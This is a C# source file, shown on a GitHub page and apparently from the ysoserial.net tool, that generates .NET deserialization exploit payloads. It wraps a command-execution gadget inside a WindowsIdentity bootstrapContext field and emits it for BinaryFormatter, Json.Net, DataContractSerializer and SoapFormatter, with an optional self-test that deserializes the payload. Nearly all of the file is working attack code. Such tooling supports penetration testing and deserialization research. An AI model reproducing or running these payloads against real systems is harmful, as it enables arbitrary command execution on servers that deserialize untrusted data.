-
Notifications
You must be signed in to change notification settings - Fork 469
/
WindowsIdentityGenerator.cs
executable file
·151 lines (136 loc) · 6.47 KB
/
WindowsIdentityGenerator.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Security.Claims;
using System.Security.Principal;
using System.Xml;
using Newtonsoft.Json;
using System.Runtime.Serialization.Formatters.Soap;
namespace ysoserial.Generators
{
class WindowsIdentityGenerator : GenericGenerator
{
public override string Description()
{
return "WindowsIdentity Gadget by Levi Broderick";
// Bridge from BinaryFormatter constructor/callback to BinaryFormatter
// Usefule for Json.Net since it invokes ISerializable callbacks during deserialization
// WindowsIdentity extends ClaimsIdentity
// https://referencesource.microsoft.com/#mscorlib/system/security/claims/ClaimsIdentity.cs,60342e51e4acc828,references
// System.Security.ClaimsIdentity.bootstrapContext is an SerializationInfo key (BootstrapContextKey)
// added during serialization with binary formatter serialized Claims
// protected ClaimsIdentity(SerializationInfo info, StreamingContext context)
// private void Deserialize
// using (MemoryStream ms = new MemoryStream(Convert.FromBase64String(info.GetString(BootstrapContextKey))))
// m_bootstrapContext = bf.Deserialize(ms, null, false);
}
public override List<string> SupportedFormatters()
{
return new List<string> { "BinaryFormatter", "Json.Net", "DataContractSerializer", "SoapFormatter"};
}
public override string Name()
{
return "WindowsIdentity";
}
[Serializable]
public class IdentityMarshal : ISerializable
{
public IdentityMarshal(string b64payload)
{
B64Payload = b64payload;
}
private string B64Payload { get; }
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
info.SetType(typeof(WindowsIdentity));
info.AddValue("System.Security.ClaimsIdentity.bootstrapContext", B64Payload);
}
}
public override object Generate(string cmd, string formatter, Boolean test)
{
Generator binaryFormatterGenerator = new TypeConfuseDelegateGenerator();
byte[] binaryFormatterPayload = (byte[])binaryFormatterGenerator.Generate(cmd, "BinaryFormatter", false);
string b64encoded = Convert.ToBase64String(binaryFormatterPayload);
if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
{
var obj = new IdentityMarshal(b64encoded);
return Serialize(obj, formatter, test);
}
else if (formatter.ToLower().Equals("json.net"))
{
string payload = @"{
'$type': 'System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'System.Security.ClaimsIdentity.bootstrapContext': '" + b64encoded + @"'
}";
if (test)
{
try
{
Object obj = JsonConvert.DeserializeObject<Object>(payload, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("datacontractserializer"))
{
string payload = $@"<root xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" type=""System.Security.Principal.WindowsIdentity, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<WindowsIdentity xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:x=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Security.Principal"">
<System.Security.ClaimsIdentity.bootstrapContext i:type=""x:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</WindowsIdentity>
</root>
";
if (test)
{
try
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml(payload);
XmlElement xmlItem = (XmlElement)xmlDoc.SelectSingleNode("root");
var s = new DataContractSerializer(Type.GetType(xmlItem.GetAttribute("type")));
var d = s.ReadObject(new XmlTextReader(new StringReader(xmlItem.InnerXml)));
}
catch
{
}
}
return payload;
}
else if (formatter.ToLower().Equals("soapformatter"))
{
string payload = $@"<SOAP-ENV:Envelope xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns:SOAP-ENC=""http://schemas.xmlsoap.org/soap/encoding/"" xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" xmlns:clr=""http://schemas.microsoft.com/soap/encoding/clr/1.0"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/"">
<SOAP-ENV:Body>
<a1:WindowsIdentity id=""ref-1"" xmlns:a1=""http://schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"">
<System.Security.ClaimsIdentity.bootstrapContext xsi:type=""xsd:string"" xmlns="""">{b64encoded}</System.Security.ClaimsIdentity.bootstrapContext>
</a1:WindowsIdentity>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
";
if (test)
{
try
{
byte[] byteArray = System.Text.Encoding.ASCII.GetBytes(payload);
MemoryStream ms = new MemoryStream(byteArray);
SoapFormatter sf = new SoapFormatter();
sf.Deserialize(ms);
}
catch
{
}
}
return payload;
}
else
{
throw new Exception("Formatter not supported");
}
}
}
}